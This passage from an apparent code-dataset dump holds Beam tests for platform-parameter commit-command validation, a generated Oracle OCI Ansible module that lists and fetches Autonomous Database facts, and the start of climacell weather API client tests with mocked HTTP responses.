id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{\n 'cmd': base_models.VersionedModel.CMD_DELETE_COMMIT}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [])\n\n def test_param_change_object_with_missing_cmd_raises_exception(self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'invalid': 'data'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'invalid': 'data'},\n 'Missing cmd key in change dict')\n ])\n\n def test_param_change_object_with_invalid_cmd_raises_exception(self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 'invalid'}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': 'invalid'},\n 'Command invalid is not allowed')\n ])\n\n def test_param_change_object_missing_attribute_in_cmd_raises_exception(\n self):\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[{'cmd': 
self.CMD_EDIT_RULES}])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n {'cmd': self.CMD_EDIT_RULES},\n 'The following required attributes are missing: new_rules')\n ])\n\n def test_param_change_object_with_extra_attribute_in_cmd_raises_exception(\n self):\n commit_dict = {\n 'cmd': self.CMD_EDIT_RULES,\n 'new_rules': [],\n 'invalid': 'invalid'\n }\n invalid_commit_cmd_model = (\n config_models.PlatformParameterSnapshotMetadataModel(\n id='model_id-1',\n created_on=self.YEAR_AGO,\n last_updated=self.NOW,\n committer_id='committer_id',\n commit_type='create',\n commit_cmds=[commit_dict])\n )\n\n output = (\n self.pipeline\n | beam.Create([invalid_commit_cmd_model])\n | beam.ParDo(\n config_validation\n .ValidatePlatformParameterSnapshotMetadataModel())\n )\n\n self.assert_pcoll_equal(output, [\n base_validation_errors.CommitCmdsValidateError(\n invalid_commit_cmd_model,\n commit_dict,\n 'The following extra attributes are present: invalid')\n ])\n"} {"ext": "py", "sha": "1a30c87670ba473f0b83f3308ae6b632f3c91bc2", "content": "#!/usr/bin/python\n# Copyright (c) 2017, 2020 Oracle and/or its affiliates.\n# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n# Apache License v2.0\n# See LICENSE.TXT for details.\n# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN\n\n\nfrom __future__ import absolute_import, division, print_function\n\n__metaclass__ = type\n\nANSIBLE_METADATA = {\n \"metadata_version\": \"1.1\",\n \"status\": [\"preview\"],\n \"supported_by\": \"community\",\n}\n\nDOCUMENTATION = \"\"\"\n---\nmodule: oci_database_autonomous_database_facts\nshort_description: Fetches details about one or multiple AutonomousDatabase resources in Oracle Cloud Infrastructure\ndescription:\n - Fetches details about one or multiple AutonomousDatabase resources in Oracle Cloud Infrastructure\n - Gets a list of Autonomous Databases based on the query parameters specified.\n - If I(autonomous_database_id) is specified, the details of a single AutonomousDatabase will be returned.\nversion_added: \"2.9\"\nauthor: Oracle (@oracle)\noptions:\n autonomous_database_id:\n description:\n - The database L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n - Required to get a specific autonomous_database.\n type: str\n aliases: [\"id\"]\n compartment_id:\n description:\n - The compartment L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n - Required to list multiple autonomous_databases.\n type: str\n autonomous_container_database_id:\n description:\n - The Autonomous Container Database L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n type: str\n sort_by:\n description:\n - The field to sort by. You can provide one sort order (`sortOrder`). Default order for TIMECREATED is descending. Default order for DISPLAYNAME\n is ascending. 
The DISPLAYNAME sort order is case sensitive.\n - \"**Note:** If you do not include the availability domain filter, the resources are grouped by availability domain, then sorted.\"\n type: str\n choices:\n - \"TIMECREATED\"\n - \"DISPLAYNAME\"\n sort_order:\n description:\n - The sort order to use, either ascending (`ASC`) or descending (`DESC`).\n type: str\n choices:\n - \"ASC\"\n - \"DESC\"\n infrastructure_type:\n description:\n - A filter to return only resources that match the given Infrastructure Type.\n type: str\n choices:\n - \"CLOUD\"\n - \"CLOUD_AT_CUSTOMER\"\n lifecycle_state:\n description:\n - A filter to return only resources that match the given lifecycle state exactly.\n type: str\n choices:\n - \"PROVISIONING\"\n - \"AVAILABLE\"\n - \"STOPPING\"\n - \"STOPPED\"\n - \"STARTING\"\n - \"TERMINATING\"\n - \"TERMINATED\"\n - \"UNAVAILABLE\"\n - \"RESTORE_IN_PROGRESS\"\n - \"RESTORE_FAILED\"\n - \"BACKUP_IN_PROGRESS\"\n - \"SCALE_IN_PROGRESS\"\n - \"AVAILABLE_NEEDS_ATTENTION\"\n - \"UPDATING\"\n - \"MAINTENANCE_IN_PROGRESS\"\n - \"RESTARTING\"\n - \"RECREATING\"\n - \"ROLE_CHANGE_IN_PROGRESS\"\n - \"UPGRADING\"\n db_workload:\n description:\n - A filter to return only autonomous database resources that match the specified workload type.\n type: str\n choices:\n - \"OLTP\"\n - \"DW\"\n - \"AJD\"\n db_version:\n description:\n - A filter to return only autonomous database resources that match the specified dbVersion.\n type: str\n is_free_tier:\n description:\n - Filter on the value of the resource's 'isFreeTier' property. A value of `true` returns only Always Free resources.\n A value of `false` excludes Always Free resources from the returned results. Omitting this parameter returns both Always Free and paid resources.\n type: bool\n display_name:\n description:\n - A filter to return only resources that match the entire display name given. The match is not case sensitive.\n type: str\n aliases: [\"name\"]\n is_refreshable_clone:\n description:\n - Filter on the value of the resource's 'isRefreshableClone' property. A value of `true` returns only refreshable clones.\n A value of `false` excludes refreshable clones from the returned results. 
Omitting this parameter returns both refreshable clones and databases\n that are not refreshable clones.\n type: bool\n is_data_guard_enabled:\n description:\n - A filter to return only resources that have Data Guard enabled.\n type: bool\nextends_documentation_fragment: [ oracle.oci.oracle ]\n\"\"\"\n\nEXAMPLES = \"\"\"\n- name: List autonomous_databases\n oci_database_autonomous_database_facts:\n compartment_id: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx\n\n- name: Get a specific autonomous_database\n oci_database_autonomous_database_facts:\n autonomous_database_id: ocid1.autonomousdatabase.oc1..xxxxxxEXAMPLExxxxxx\n\n\"\"\"\n\nRETURN = \"\"\"\nautonomous_databases:\n description:\n - List of AutonomousDatabase resources\n returned: on success\n type: complex\n contains:\n id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the Autonomous Database.\n returned: on success\n type: string\n sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx\n compartment_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the compartment.\n returned: on success\n type: string\n sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx\n lifecycle_state:\n description:\n - The current state of the Autonomous Database.\n returned: on success\n type: string\n sample: PROVISIONING\n lifecycle_details:\n description:\n - Information about the current lifecycle state.\n returned: on success\n type: string\n sample: lifecycle_details_example\n db_name:\n description:\n - The database name.\n returned: on success\n type: string\n sample: db_name_example\n is_free_tier:\n description:\n - Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of\n memory. For Always Free databases, memory and CPU cannot be scaled.\n returned: on success\n type: bool\n sample: true\n system_tags:\n description:\n - System tags for this resource. Each key is predefined and scoped to a namespace.\n For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).\n returned: on success\n type: dict\n sample: {}\n time_reclamation_of_free_autonomous_database:\n description:\n - The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the\n database will automatically be put into the STOPPED state.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_deletion_of_free_autonomous_database:\n description:\n - The date and time the Always Free database will be automatically deleted because of inactivity. 
If the database is in the STOPPED state and\n without activity until this time, it will be deleted.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n backup_config:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n manual_backup_bucket_name:\n description:\n - Name of L(Object Storage,https://docs.cloud.oracle.com/Content/Object/Concepts/objectstorageoverview.htm) bucket to use for storing\n manual backups.\n returned: on success\n type: string\n sample: manual_backup_bucket_name_example\n manual_backup_type:\n description:\n - The manual backup destination type.\n returned: on success\n type: string\n sample: NONE\n cpu_core_count:\n description:\n - The number of OCPU cores to be made available to the database.\n returned: on success\n type: int\n sample: 56\n data_storage_size_in_tbs:\n description:\n - The quantity of data in the database, in terabytes.\n returned: on success\n type: int\n sample: 56\n infrastructure_type:\n description:\n - The infrastructure type this resource belongs to.\n returned: on success\n type: string\n sample: CLOUD\n is_dedicated:\n description:\n - True if the database uses L(dedicated Exadata infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adbddoverview.htm).\n returned: on success\n type: bool\n sample: true\n autonomous_container_database_id:\n description:\n - The Autonomous Container Database L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm).\n returned: on success\n type: string\n sample: ocid1.autonomouscontainerdatabase.oc1..xxxxxxEXAMPLExxxxxx\n time_created:\n description:\n - The date and time the Autonomous Database was created.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n display_name:\n description:\n - The user-friendly name for the Autonomous Database. The name does not have to be unique.\n returned: on success\n type: string\n sample: display_name_example\n service_console_url:\n description:\n - The URL of the Service Console for the Autonomous Database.\n returned: on success\n type: string\n sample: service_console_url_example\n connection_strings:\n description:\n - The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. 
Use the password you entered\n when creating the Autonomous Database for the password value.\n returned: on success\n type: complex\n contains:\n high:\n description:\n - The High database service provides the highest level of resources to each SQL statement resulting in the highest performance, but\n supports the fewest number of concurrent SQL statements.\n returned: on success\n type: string\n sample: high_example\n medium:\n description:\n - The Medium database service provides a lower level of resources to each SQL statement potentially resulting a lower level of\n performance, but supports more concurrent SQL statements.\n returned: on success\n type: string\n sample: medium_example\n low:\n description:\n - The Low database service provides the least level of resources to each SQL statement, but supports the most number of concurrent SQL\n statements.\n returned: on success\n type: string\n sample: low_example\n dedicated:\n description:\n - The database service provides the least level of resources to each SQL statement, but supports the most number of concurrent SQL\n statements.\n returned: on success\n type: string\n sample: dedicated_example\n all_connection_strings:\n description:\n - Returns all connection strings that can be used to connect to the Autonomous Database.\n For more information, please see L(Predefined Database Service Names for Autonomous Transaction\n Processing,https://docs.oracle.com/en/cloud/paas/atp-cloud/atpug/connect-predefined.html#GUID-9747539B-FD46-44F1-8FF8-F5AC650F15BE)\n returned: on success\n type: dict\n sample: {}\n connection_urls:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n sql_dev_web_url:\n description:\n - Oracle SQL Developer Web URL.\n returned: on success\n type: string\n sample: sql_dev_web_url_example\n apex_url:\n description:\n - Oracle Application Express (APEX) URL.\n returned: on success\n type: string\n sample: apex_url_example\n machine_learning_user_management_url:\n description:\n - Oracle Machine Learning user management URL.\n returned: on success\n type: string\n sample: machine_learning_user_management_url_example\n license_model:\n description:\n - The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-\n premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud.\n License Included allows you to subscribe to new Oracle Database software licenses and the Database service.\n Note that when provisioning an Autonomous Database on L(dedicated Exadata\n infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute\n is already set at the\n Autonomous Exadata Infrastructure level. When using L(shared Exadata\n infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will\n supply the value of `BRING_YOUR_OWN_LICENSE`.\n returned: on success\n type: string\n sample: LICENSE_INCLUDED\n used_data_storage_size_in_tbs:\n description:\n - The amount of storage that has been used, in terabytes.\n returned: on success\n type: int\n sample: 56\n freeform_tags:\n description:\n - Free-form tags for this resource. 
Each tag is a simple key-value pair with no predefined name, type, or namespace.\n For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).\n - \"Example: `{\\\\\"Department\\\\\": \\\\\"Finance\\\\\"}`\"\n returned: on success\n type: dict\n sample: {'Department': 'Finance'}\n defined_tags:\n description:\n - Defined tags for this resource. Each key is predefined and scoped to a namespace.\n For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).\n returned: on success\n type: dict\n sample: {'Operations': {'CostCenter': 'US'}}\n subnet_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.\n - \"**Subnet Restrictions:**\n - For bare metal DB systems and for single node virtual machine DB systems, do not use a subnet that overlaps with 192.168.16.16/28.\n - For Exadata and virtual machine 2-node RAC systems, do not use a subnet that overlaps with 192.168.128.0/20.\n - For Autonomous Database, setting this will disable public secure access to the database.\"\n - These subnets are used by the Oracle Clusterware private interconnect on the database instance.\n Specifying an overlapping subnet will cause the private interconnect to malfunction.\n This restriction applies to both the client subnet and the backup subnet.\n returned: on success\n type: string\n sample: ocid1.subnet.oc1..xxxxxxEXAMPLExxxxxx\n nsg_ids:\n description:\n - \"A list of the L(OCIDs,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this\n resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about\n NSGs, see L(Security Rules,https://docs.cloud.oracle.com/Content/Network/Concepts/securityrules.htm).\n **NsgIds restrictions:**\n - Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.\"\n returned: on success\n type: list\n sample: []\n private_endpoint:\n description:\n - The private endpoint for the resource.\n returned: on success\n type: string\n sample: private_endpoint_example\n private_endpoint_label:\n description:\n - The private endpoint label for the resource. Setting this to an empty string, after the private endpoint database gets created, will change\n the same private endpoint database to the public endpoint database.\n returned: on success\n type: string\n sample: private_endpoint_label_example\n private_endpoint_ip:\n description:\n - The private endpoint Ip address for the resource.\n returned: on success\n type: string\n sample: private_endpoint_ip_example\n db_version:\n description:\n - A valid Oracle Database version for Autonomous Database.\n returned: on success\n type: string\n sample: db_version_example\n is_preview:\n description:\n - Indicates if the Autonomous Database version is a preview version.\n returned: on success\n type: bool\n sample: true\n db_workload:\n description:\n - \"The Autonomous Database workload type. 
The following values are valid:\"\n - \"- OLTP - indicates an Autonomous Transaction Processing database\n - DW - indicates an Autonomous Data Warehouse database\n - AJD - indicates an Autonomous JSON Database\"\n returned: on success\n type: string\n sample: OLTP\n is_access_control_enabled:\n description:\n - Indicates if the database-level access control is enabled.\n If disabled, database access is defined by the network security rules.\n If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While\n specifying `whitelistedIps` rules is optional,\n if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later\n using the `UpdateAutonomousDatabase` API operation or edit option in console.\n When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be\n disabled for the clone.\n - This property is applicable only to Autonomous Databases on the Exadata Cloud@Customer platform.\n returned: on success\n type: bool\n sample: true\n whitelisted_ips:\n description:\n - The client IP access control list (ACL). This feature is available for autonomous databases on L(shared Exadata\n infrastructure,https://docs.cloud.oracle.com/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer.\n Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.\n - \"For shared Exadata infrastructure, this is an array of CIDR (Classless Inter-Domain Routing) notations for a subnet or VCN OCID.\n Use a semicolon (;) as a deliminator between the VCN-specific subnets or IPs.\n Example: `[\\\\\"1.1.1.1\\\\\",\\\\\"1.1.1.0/24\\\\\",\\\\\"ocid1.vcn.oc1.sea.<unique_id>\\\\\",\\\\\"ocid1.vcn.oc1.sea.<unique_id1>;1.1.1.1\\\\\",\\\\\"ocid1.vcn.oc1.se\n a.<unique_id2>;1.1.0.0/16\\\\\"]`\n For Exadata Cloud@Customer, this is an array of IP addresses or CIDR (Classless Inter-Domain Routing) notations.\n Example: `[\\\\\"1.1.1.1\\\\\",\\\\\"1.1.1.0/24\\\\\",\\\\\"1.1.2.25\\\\\"]`\"\n - For an update operation, if you want to delete all the IPs in the ACL, use an array with a single empty string entry.\n returned: on success\n type: list\n sample: []\n is_auto_scaling_enabled:\n description:\n - Indicates if auto scaling is enabled for the Autonomous Database CPU core count.\n returned: on success\n type: bool\n sample: true\n data_safe_status:\n description:\n - Status of the Data Safe registration for this Autonomous Database.\n returned: on success\n type: string\n sample: REGISTERING\n operations_insights_status:\n description:\n - Status of Operations Insights for this Autonomous Database.\n returned: on success\n type: string\n sample: ENABLING\n time_maintenance_begin:\n description:\n - The date and time when maintenance will begin.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_maintenance_end:\n description:\n - The date and time when maintenance will end.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n is_refreshable_clone:\n description:\n - Indicates whether the Autonomous Database is a refreshable clone.\n returned: on success\n type: bool\n sample: true\n time_of_last_refresh:\n description:\n - The date and time when last refresh happened.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_of_last_refresh_point:\n description:\n 
- The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the\n refresh point is not included in the refresh.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_of_next_refresh:\n description:\n - The date and time of next refresh.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n open_mode:\n description:\n - The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.\n returned: on success\n type: string\n sample: READ_ONLY\n refreshable_status:\n description:\n - The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous\n Database.\n returned: on success\n type: string\n sample: REFRESHING\n refreshable_mode:\n description:\n - The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous\n Database.\n returned: on success\n type: string\n sample: AUTOMATIC\n source_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that was cloned to create\n the current Autonomous Database.\n returned: on success\n type: string\n sample: ocid1.source.oc1..xxxxxxEXAMPLExxxxxx\n permission_level:\n description:\n - The Autonomous Database permission level. Restricted mode allows access only to admin users.\n returned: on success\n type: string\n sample: RESTRICTED\n time_of_last_switchover:\n description:\n - The timestamp of the last switchover operation for the Autonomous Database.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n time_of_last_failover:\n description:\n - The timestamp of the last failover operation.\n returned: on success\n type: string\n sample: 2013-10-20T19:20:30+01:00\n is_data_guard_enabled:\n description:\n - Indicates whether the Autonomous Database has Data Guard enabled.\n returned: on success\n type: bool\n sample: true\n failed_data_recovery_in_seconds:\n description:\n - Indicates the number of seconds of data loss for a Data Guard failover.\n returned: on success\n type: int\n sample: 56\n standby_db:\n description:\n - \"\"\n returned: on success\n type: complex\n contains:\n lag_time_in_seconds:\n description:\n - The amount of time, in seconds, that the data of the standby database lags the data of the primary database. Can be used to determine\n the potential data loss in the event of a failover.\n returned: on success\n type: int\n sample: 56\n lifecycle_state:\n description:\n - The current state of the Autonomous Database.\n returned: on success\n type: string\n sample: PROVISIONING\n lifecycle_details:\n description:\n - Additional information about the current lifecycle state.\n returned: on success\n type: string\n sample: lifecycle_details_example\n available_upgrade_versions:\n description:\n - List of Oracle Database versions available for a database upgrade. 
If there are no version upgrades available, this list is empty.\n returned: on success\n type: list\n sample: []\n key_store_id:\n description:\n - The L(OCID,https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the key store.\n returned: on success\n type: string\n sample: ocid1.keystore.oc1..xxxxxxEXAMPLExxxxxx\n key_store_wallet_name:\n description:\n - The wallet name for Oracle Key Vault.\n returned: on success\n type: string\n sample: key_store_wallet_name_example\n sample: [{\n \"id\": \"ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx\",\n \"compartment_id\": \"ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx\",\n \"lifecycle_state\": \"PROVISIONING\",\n \"lifecycle_details\": \"lifecycle_details_example\",\n \"db_name\": \"db_name_example\",\n \"is_free_tier\": true,\n \"system_tags\": {},\n \"time_reclamation_of_free_autonomous_database\": \"2013-10-20T19:20:30+01:00\",\n \"time_deletion_of_free_autonomous_database\": \"2013-10-20T19:20:30+01:00\",\n \"backup_config\": {\n \"manual_backup_bucket_name\": \"manual_backup_bucket_name_example\",\n \"manual_backup_type\": \"NONE\"\n },\n \"cpu_core_count\": 56,\n \"data_storage_size_in_tbs\": 56,\n \"infrastructure_type\": \"CLOUD\",\n \"is_dedicated\": true,\n \"autonomous_container_database_id\": \"ocid1.autonomouscontainerdatabase.oc1..xxxxxxEXAMPLExxxxxx\",\n \"time_created\": \"2013-10-20T19:20:30+01:00\",\n \"display_name\": \"display_name_example\",\n \"service_console_url\": \"service_console_url_example\",\n \"connection_strings\": {\n \"high\": \"high_example\",\n \"medium\": \"medium_example\",\n \"low\": \"low_example\",\n \"dedicated\": \"dedicated_example\",\n \"all_connection_strings\": {}\n },\n \"connection_urls\": {\n \"sql_dev_web_url\": \"sql_dev_web_url_example\",\n \"apex_url\": \"apex_url_example\",\n \"machine_learning_user_management_url\": \"machine_learning_user_management_url_example\"\n },\n \"license_model\": \"LICENSE_INCLUDED\",\n \"used_data_storage_size_in_tbs\": 56,\n \"freeform_tags\": {'Department': 'Finance'},\n \"defined_tags\": {'Operations': {'CostCenter': 'US'}},\n \"subnet_id\": \"ocid1.subnet.oc1..xxxxxxEXAMPLExxxxxx\",\n \"nsg_ids\": [],\n \"private_endpoint\": \"private_endpoint_example\",\n \"private_endpoint_label\": \"private_endpoint_label_example\",\n \"private_endpoint_ip\": \"private_endpoint_ip_example\",\n \"db_version\": \"db_version_example\",\n \"is_preview\": true,\n \"db_workload\": \"OLTP\",\n \"is_access_control_enabled\": true,\n \"whitelisted_ips\": [],\n \"is_auto_scaling_enabled\": true,\n \"data_safe_status\": \"REGISTERING\",\n \"operations_insights_status\": \"ENABLING\",\n \"time_maintenance_begin\": \"2013-10-20T19:20:30+01:00\",\n \"time_maintenance_end\": \"2013-10-20T19:20:30+01:00\",\n \"is_refreshable_clone\": true,\n \"time_of_last_refresh\": \"2013-10-20T19:20:30+01:00\",\n \"time_of_last_refresh_point\": \"2013-10-20T19:20:30+01:00\",\n \"time_of_next_refresh\": \"2013-10-20T19:20:30+01:00\",\n \"open_mode\": \"READ_ONLY\",\n \"refreshable_status\": \"REFRESHING\",\n \"refreshable_mode\": \"AUTOMATIC\",\n \"source_id\": \"ocid1.source.oc1..xxxxxxEXAMPLExxxxxx\",\n \"permission_level\": \"RESTRICTED\",\n \"time_of_last_switchover\": \"2013-10-20T19:20:30+01:00\",\n \"time_of_last_failover\": \"2013-10-20T19:20:30+01:00\",\n \"is_data_guard_enabled\": true,\n \"failed_data_recovery_in_seconds\": 56,\n \"standby_db\": {\n \"lag_time_in_seconds\": 56,\n \"lifecycle_state\": \"PROVISIONING\",\n \"lifecycle_details\": \"lifecycle_details_example\"\n },\n 
\"available_upgrade_versions\": [],\n \"key_store_id\": \"ocid1.keystore.oc1..xxxxxxEXAMPLExxxxxx\",\n \"key_store_wallet_name\": \"key_store_wallet_name_example\"\n }]\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils\nfrom ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (\n OCIResourceFactsHelperBase,\n get_custom_class,\n)\n\ntry:\n from oci.database import DatabaseClient\n\n HAS_OCI_PY_SDK = True\nexcept ImportError:\n HAS_OCI_PY_SDK = False\n\n\nclass AutonomousDatabaseFactsHelperGen(OCIResourceFactsHelperBase):\n \"\"\"Supported operations: get, list\"\"\"\n\n def get_required_params_for_get(self):\n return [\n \"autonomous_database_id\",\n ]\n\n def get_required_params_for_list(self):\n return [\n \"compartment_id\",\n ]\n\n def get_resource(self):\n return oci_common_utils.call_with_backoff(\n self.client.get_autonomous_database,\n autonomous_database_id=self.module.params.get(\"autonomous_database_id\"),\n )\n\n def list_resources(self):\n optional_list_method_params = [\n \"autonomous_container_database_id\",\n \"sort_by\",\n \"sort_order\",\n \"infrastructure_type\",\n \"lifecycle_state\",\n \"db_workload\",\n \"db_version\",\n \"is_free_tier\",\n \"display_name\",\n \"is_refreshable_clone\",\n \"is_data_guard_enabled\",\n ]\n optional_kwargs = dict(\n (param, self.module.params[param])\n for param in optional_list_method_params\n if self.module.params.get(param) is not None\n )\n return oci_common_utils.list_all_resources(\n self.client.list_autonomous_databases,\n compartment_id=self.module.params.get(\"compartment_id\"),\n **optional_kwargs\n )\n\n\nAutonomousDatabaseFactsHelperCustom = get_custom_class(\n \"AutonomousDatabaseFactsHelperCustom\"\n)\n\n\nclass ResourceFactsHelper(\n AutonomousDatabaseFactsHelperCustom, AutonomousDatabaseFactsHelperGen\n):\n pass\n\n\ndef main():\n module_args = oci_common_utils.get_common_arg_spec()\n module_args.update(\n dict(\n autonomous_database_id=dict(aliases=[\"id\"], type=\"str\"),\n compartment_id=dict(type=\"str\"),\n autonomous_container_database_id=dict(type=\"str\"),\n sort_by=dict(type=\"str\", choices=[\"TIMECREATED\", \"DISPLAYNAME\"]),\n sort_order=dict(type=\"str\", choices=[\"ASC\", \"DESC\"]),\n infrastructure_type=dict(\n type=\"str\", choices=[\"CLOUD\", \"CLOUD_AT_CUSTOMER\"]\n ),\n lifecycle_state=dict(\n type=\"str\",\n choices=[\n \"PROVISIONING\",\n \"AVAILABLE\",\n \"STOPPING\",\n \"STOPPED\",\n \"STARTING\",\n \"TERMINATING\",\n \"TERMINATED\",\n \"UNAVAILABLE\",\n \"RESTORE_IN_PROGRESS\",\n \"RESTORE_FAILED\",\n \"BACKUP_IN_PROGRESS\",\n \"SCALE_IN_PROGRESS\",\n \"AVAILABLE_NEEDS_ATTENTION\",\n \"UPDATING\",\n \"MAINTENANCE_IN_PROGRESS\",\n \"RESTARTING\",\n \"RECREATING\",\n \"ROLE_CHANGE_IN_PROGRESS\",\n \"UPGRADING\",\n ],\n ),\n db_workload=dict(type=\"str\", choices=[\"OLTP\", \"DW\", \"AJD\"]),\n db_version=dict(type=\"str\"),\n is_free_tier=dict(type=\"bool\"),\n display_name=dict(aliases=[\"name\"], type=\"str\"),\n is_refreshable_clone=dict(type=\"bool\"),\n is_data_guard_enabled=dict(type=\"bool\"),\n )\n )\n\n module = AnsibleModule(argument_spec=module_args)\n\n if not HAS_OCI_PY_SDK:\n module.fail_json(msg=\"oci python sdk required for this module.\")\n\n resource_facts_helper = ResourceFactsHelper(\n module=module,\n resource_type=\"autonomous_database\",\n service_client_class=DatabaseClient,\n namespace=\"database\",\n )\n\n result = []\n\n if 
resource_facts_helper.is_get():\n result = [resource_facts_helper.get()]\n elif resource_facts_helper.is_list():\n result = resource_facts_helper.list()\n else:\n resource_facts_helper.fail()\n\n module.exit_json(autonomous_databases=result)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30c8c07446a29b3131db3c5e0363a440ade735", "content": "import json\nimport os\n\nfrom unittest import TestCase, mock\nfrom climacell.api import Client, Measurement, Response, Error\nfrom climacell.fields import (\n FIELD_TEMP, FIELD_DEW_POINT, FIELD_HUMIDITY,\n FIELD_WIND_SPEED, FIELD_WIND_GUST, FIELD_WIND_DIRECTION,\n FIELD_SUNRISE, FIELD_SUNSET,\n)\nfrom climacell.utils import join_fields\n\n\nERROR_FILE = os.path.dirname(__file__) + '/data/error_example.json'\nHOURLY_FILE = os.path.dirname(__file__) + '/data/hourly_example.json'\nDAILY_FILE = os.path.dirname(__file__) + '/data/daily_example.json'\nNOWCAST_FILE = os.path.dirname(__file__) + '/data/nowcast_example.json'\n\n\nclass MockResponse:\n def __init__(self, data, status_code):\n self.data = data\n self.status_code = status_code\n\n def json(self):\n return self.data\n\n\ndef mock_requests_get(*args, **kwargs):\n base_url = 'https://api.climacell.co/v3'\n\n if args[0] is None:\n return MockResponse(None, 404)\n elif args[0] == base_url + '/weather/forecast/hourly':\n file = HOURLY_FILE\n elif args[0] == base_url + '/weather/nowcast':\n file = NOWCAST_FILE\n elif args[0] == base_url + '/weather/forecast/daily':\n file = DAILY_FILE\n\n with 